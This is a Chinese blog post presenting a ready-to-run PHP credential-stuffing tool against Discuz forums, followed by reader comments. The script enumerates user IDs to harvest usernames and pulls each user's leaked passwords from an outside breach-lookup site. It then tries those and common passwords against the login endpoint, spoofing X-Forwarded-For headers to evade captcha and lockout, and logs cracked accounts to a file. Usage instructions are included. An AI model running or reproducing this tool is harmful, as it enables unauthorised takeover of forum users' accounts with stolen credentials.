Discuz爆破无视验证码


<?php
class fuckdz{

	public function sgk($user){
		$a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");
	    $a=iconv("UTF-8", "GB2312//IGNORE", $a);
		preg_match_all("/7%\">(.*)</isU",$a,$arr);
		unset($arr[0]);
		foreach ($arr as $key=>$r){
			return $r;
			}
	}

	public function getuid($host,$uid){
			$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
			$opts = array (   
			'http' => array (   
			'method' => 'GET',   
			'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
			'timeout'=>15, ) 
			); 
			$context = stream_context_create($opts); 
			 $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid",false,$context);
			if(strpos($a,'charset=utf-8')){
			$a=iconv("UTF-8", "GB2312//IGNORE", $a);

			}

			if(preg_match("/<title>(.*)的个人/isU",$a,$arr)){

			$a=str_replace("\r","",trim($arr[1]));
			$a=trim(str_replace("\n","",$a));
			return $a; 
			}else{
			return false;
			}

	}

	public function is_pass($host,$user,$pass){
			$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
			$opts = array (   
			'http' => array (   
			'method' => 'GET',   
			'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobil\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
			'timeout'=>15, ) 
			); 

			$context = stream_context_create($opts); 
			 $a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);
			if(strpos($a,"window.location.href")){
				return true;
			}else{
				return false;
			}

	}
	public function crack($host,$a,$b){
	$host=str_replace("http://","",$host);
	$host="http://".$host."/";

	for($vip=$a;$vip<=$b;$vip++){ 

		if(!($user=$this->getuid($host,$vip))){

		 continue;
		}
		$pass=$this->sgk($user);
		array_push($pass,"123456");
		array_push($pass,"654321");
		array_push($pass,"123123");
		array_push($pass,"woaini");
		array_push($pass,"caonima");
		array_push($pass,"12345");
		array_push($pass,"12345789");
		array_push($pass,"5201314");
		array_push($pass,"1314520");
		array_push($pass,$user);
		array_push($pass,$user."123456");
		array_push($pass,"abc123");
		array_push($pass,$user."..");

			for($i=0;isset($pass[$i]);$i++){ 
				echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";
				if($this->is_pass($host,$user,$pass[$i])){
						echo "爆破成功!\r\n--------------------";
						file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);
						break;

					}else{
						echo "爆破失败";
					}

				} 

		}

	}

}
$f=new fuckdz();
//error_reporting(0);
set_time_limit(0);

if(empty($argv[1])){
print_r("
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   

      开始爆破:php.exe $argv[0] 网址 起始uid 结束uid 
      示例: php.exe $argv[0] https://phpinfo.me/ 1 255
      结果保存在ok.txt里
      Blog:https://phpinfo.me

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   \n\n\n
");
}else{

if(!empty($argv[1])){

    $f->crack($argv[1],$argv[2],$argv[3]);
  }else{
    echo "逗比";
 }

}

?>

没图说个cc

123

文 / admin
9 COMMENTS
  1. 2014/06/03
    小城

    这个和乌云的有什么区别

    • admin
      2014/06/03
      admin
      @小城 修正了下错误
  2. 2014/06/03
    雷影

    test

    • admin
      2014/06/03
      admin
      @雷影 1
  3. 2014/06/03
    无奈

    怎么样修改成多线程的呢

    • admin
      2014/06/04
      admin
      @无奈 php多线程就算了。。
  4. 2014/06/07
    安盛

    这个爆破成功的出来的 txt在哪里 找不到

  5. 2014/06/18
    菜鸟

    这个怎么用啊?

  6. 2014/06/24
    test

    用自己的小论坛测试了一下,后台看到一堆爆破的密码错误记录。。。吓死

LEAVE A REPLY

loading